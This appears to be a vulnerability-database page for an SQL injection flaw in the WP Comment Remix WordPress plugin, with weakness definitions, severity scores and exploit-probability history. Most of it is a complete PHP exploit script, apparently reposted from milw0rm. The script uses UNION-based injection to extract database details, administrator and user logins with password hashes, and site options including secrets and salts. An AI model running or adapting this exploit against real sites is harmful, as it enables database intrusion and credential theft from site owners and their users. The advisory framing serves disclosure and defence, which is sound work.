CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
SQL injection vulnerability in ajax_comments.php in the WP Comment Remix plugin before 1.4.4 for WordPress allows remote attackers to execute arbitrary SQL commands via the p parameter.
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
7.5
AV:N/AC:L/Au:N/C:P/I:P/A:P
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
1.14%
–
–
2022-03-13
–
–
1.14%
–
–
2022-04-03
–
–
1.14%
–
–
2022-06-26
–
–
1.14%
–
–
2022-09-25
–
–
1.14%
–
–
2023-02-26
–
–
1.14%
–
–
2023-03-12
–
–
–
0.14%
–
2023-03-26
–
–
–
0.14%
–
2023-08-27
–
–
–
0.14%
–
2023-10-01
–
–
–
0.21%
–
2024-02-11
–
–
–
0.21%
–
2024-04-07
–
–
–
0.21%
–
2024-06-02
–
–
–
0.21%
–
2024-07-14
–
–
–
0.21%
–
2024-07-28
–
–
–
0.21%
–
2024-08-25
–
–
–
0.21%
–
2024-09-22
–
–
–
0.21%
–
2024-11-03
–
–
–
0.21%
–
2024-12-22
–
–
–
0.27%
–
2025-01-12
–
–
–
0.27%
–
2025-01-19
–
–
–
0.27%
–
2025-03-18
–
–
–
–
0.48%
2025-03-30
–
–
–
–
0.66%
2025-04-15
–
–
–
–
0.66%
2025-04-15
–
–
–
–
0.66,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
<?php
/**
* WP Comment Remix 1.4.3 SQL Injection
* Proof of Concept
* By g30rg3_x <g30rg3x_at_chxsecurity_dot_org>
*
* Advisory:
* http://chxsecurity.org/advisories/adv-3-full.txt
*
* PoC Mirror:
* http://chxsecurity.org/proof-of-concepts/wp-comment-remix-143.zip
*
* Attention:
* This is a Proof-of-Concept it was never intended to be fully functional
*
* Notes:
* Uses cURL
*/
// Script Header
function head() {
print "\n WP Comment Remix 1.4.3 SQL Injection";
print "\n By g30rg3_x <g30rg3x_at_chxsecurity_dot_org>";
print "\n ------------------------------------------------";
print "\n This is a Proof-of-Concept it was never intended to be fully functional\n";
}
// Usage Information
function usage() {
global $argv;
head();
print "\n Usage: php {$argv[0]} <host> <path> <information> <table-prefix>\n";
print "\n <host>: Hostname or IP Address";
print "\n <path>: Path to WordPress (Defaults to: /)";
print "\n <information>: Information to Extract (Defaults to: relevant)";
print "\n dbinfo = Extract MySQL Current User, Database and Version";
print "\n admins = Extract Only Admins (users with level 10)";
print "\n users = Extract All Users (includes admins)";
print "\n options = Extract Relevant Options like active_plugins, secret, ...";
print "\n alloptions = Extrac All Options (Huge data would be directly printed out!)";
print "\n relevant = dbinfo + admins + options";
print "\n all = dbinfo + users + alloptions";
print "\n <table-prefix>: WordPress Tables Prefix (Defaults to: wp_)\n";
print "\n Examples:";
print "\n php {$argv[0]} foo.bar";
print "\n php {$argv[0]} foo.bar /wordpress/";
print "\n php {$argv[0]} foo.bar /wordpress/ all foo_";
print "\n";
exit();
}
// cURL HTTP GET
function GET($url) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Connection: Close'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_USERAGENT, 'WP-Comment-Remix 1.4.3 SQL Injection Proof-of-Concept');
$result = curl_exec($ch);
curl_close($ch);
if ( preg_match('%HTTP/[0-9.x]+ 200 OK%', $result) )
return $result;
else
return false;
}
// Obtain Database Information
function obtainDBInfo() {
global $prefix, $url;
$injection = '/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,CONCAT(0x757365727B,user(),0x7D44427B,database(),0x7D76657273696F6E7B,version(),0x7D),10,11,12,13,14,15--';
$result = GET($url . $injection);
preg_match_all('/user\{(?P<user>.+)\}DB\{(?P<DB>.+)\}version\{(?P<version>.+)\}/', $result, $captured, PREG_PATTERN_ORDER);
$db['user'] = $captured['user'][0];
$db['name'] = $captured['DB'][0];
$db['version'] = $captured['version'][0];
return $db;
}
// Obtain WordPress Users Information
function obtainUsersInfo($all = false) {
global $prefix, $url;
$injection = "/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,CONCAT(0x757365727B,{$prefix}users.user_login,0x7D706173737B,{$prefix}users.user_pass,0x7D),10,11,12,13,14,15/**/FROM/**/{$prefix}users" . ( $all ? '' : ",{$prefix}usermeta/**/WHERE/**/{$prefix}users.ID={$prefix}usermeta.user_id/**/AND/**/{$prefix}usermeta.meta_key/**/REGEXP/**/0x757365725F6C6576656C/**/AND/**/{$prefix}usermeta.meta_value=10" ) . '--';
$result = GET($url . $injection);
preg_match_all('/user\{(?P<user>.+)\}pass\{(?P<pass>.+)\}/', $result, $captured, PREG_PATTERN_ORDER);
for( $i = 0; $i < count($captured['user']); $i++ )
$users[$captured['user'][$i]] = $captured['pass'][$i];
return $users;
}
// Obtain WordPress Options Information
function obtainOptionsInfo($all = false) {
global $prefix, $url;
$injection = "/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,CONCAT(option_name,0x7B7C,option_value,0x7C7D),10,11,12,13,14,15/**/FROM/**/{$prefix}options" . ( $all ? '' : '/**/WHERE/**/option_name/**/REGEXP/**/0x7369746575726C7C6C6F67696E7C757365727C706173737C617574687C7365637265747C73616C747C6163746976655F706C7567696E737C73656564' ) . '--';
$result = GET($url . $injection);
preg_match_all('%<p>(?P<name>.+)\{\|(?P<value>.+)\|\}</p>%', $result, $captured, PREG_PATTERN_ORDER);
for( $i = 0; $i < count($captured['name']); $i++ )
$options[$captured['name'][$i]] = $captured['value'][$i];
return $options;
}
// Set no time limit (only if safe mode is off)
if ( !ini_get('safe_mode') )
set_time_limit(0);
// Print usage if there is no host
if ( !isset($argv[1]) )
usage();
// Header, Arguments and Generate URL
head();
$host = $argv[1];
$path = isset($argv[2]) ? $argv[2] : '/';
$info = isset($argv[3]) ? $argv[3] : 'relevant';
$prefix = isset($argv[4]) ? $argv[4] : 'wp_';
$url = 'http://' . $host . $path . 'wp-content/plugins/wp-comment-remix/ajax_comments.php?p=0';
// Check if we can reach "ajax_comments.php"
print "\n Does ajax_comments.php exist? ... ";
$result = GET($url);
if ( !$result ) {
print "No";
print "\n -----------------------------------------------------------";
print "\n Seems that the site does not have WP Comment Remix installed";
print "\n OR the path you proportionate is incorrect.";
print "\n Please review your arguments and try again.\n";
exit();
}
print 'Yes';
// Check if is it possible to inject...
// ToDo: Some WordPress installations return more than 15 columns (this is caused by some plugins that alter
// the comments table structure and don't revert back this change) so this injection may fail A LOT in a non-default
// enviroment (ie. sites with many plugins), so if you REALLY want this PoC to be more "functional" then improve
// this part of the PoC; it was never my intention to deliver a "fully functional" Proof-of-Concept.
print "\n Can we Inject SQL Code? ... ";
$result = GET($url . '/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--');
if ( preg_match('/There are no comments for this post/', $result) ) {
print "No";
print "\n --------------------------------------";
print "\n Seems that the host is already patched.\n";
exit();
}
print 'Yes';
// Check table prefix but don't check if the user selected to obtain database information.
if ( $info != 'dbinfo') {
print "\n Is \"{$prefix}\" the table prefix? ... ";
$result = GET($url . "/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/**/FROM/**/{$prefix}users--");
if ( preg_match('/There are no comments for this post/', $result) ) {
print "No";
print "\n ------------------------------------------------";
print "\n Seems that the table prefix \"{$prefix}\" is incorrect.";
print "\n But this time we are not exiting, cause we can still extract";
print "\n the database information, so m just going to change your choice";
print "\n to dbinfo so you can still get that valuable information.";
print "\n ------------------------------------------------\n";
$info = 'dbinfo';
} else {
print 'Yes';
}
}
// Now is time to inject
print "\n\n Seems that everything is fine so now it's super fun time :P...";
switch($info) {
case 'all':
$db = obtainDBInfo();
$users = obtainUsersInfo(true);
$options = obtainOptionsInfo(true);
break;
case 'relevant':
$db = obtainDBInfo();
$users = obtainUsersInfo();
$options = obtainOptionsInfo();
break;
case 'dbinfo':
$db = obtainDBInfo();
break;
case 'admins':
$users = obtainUsersInfo();
break;
case 'users':
$users = obtainUsersInfo(true);
break;
case 'options':
$options = obtainOptionsInfo();
break;
case 'alloptions':
$options = obtainOptionsInfo(true);
break;
}
/* It's Show Time */
// Database Information
if ( !empty($db) ) {
print "\n\n Database Information";
print "\n ---------------------";
print "\n MySQL User: {$db['user']}";
print "\n MySQL Version: {$db['version']}";
print "\n MySQL Database Name: {$db['name']}";
}
// Users Information
if ( !empty($users) ) {
print "\n\n Users";
print "\n ---------";
foreach( (array) $users as $user => $pass ) {
print "\n Username: {$user}";
print "\n Password: {$pass} " . ( strlen($pass) <= 32 ? '(MD5)' : '(Passhash)' );
print "\n ---------";
}
}
// Options Information
if ( !empty($options) ) {
print "\n\n Options";
print "\n ---------";
foreach( (array) $options as $name => $value ) {
print "\n Name: {$name}";
print "\n Value: {$value}";
print "\n ---------";
}
}
// Good Bye =)
print "\n\n Have Fun! =)\n";
?>
# milw0rm.com [2008-10-14]
Products Mentioned
Configuraton 0
Pressography>>Wp_comment_remix_plugin >> Version To (including) 1.4.3
Pressography>>Wp_comment_remix_plugin >> Version 1.4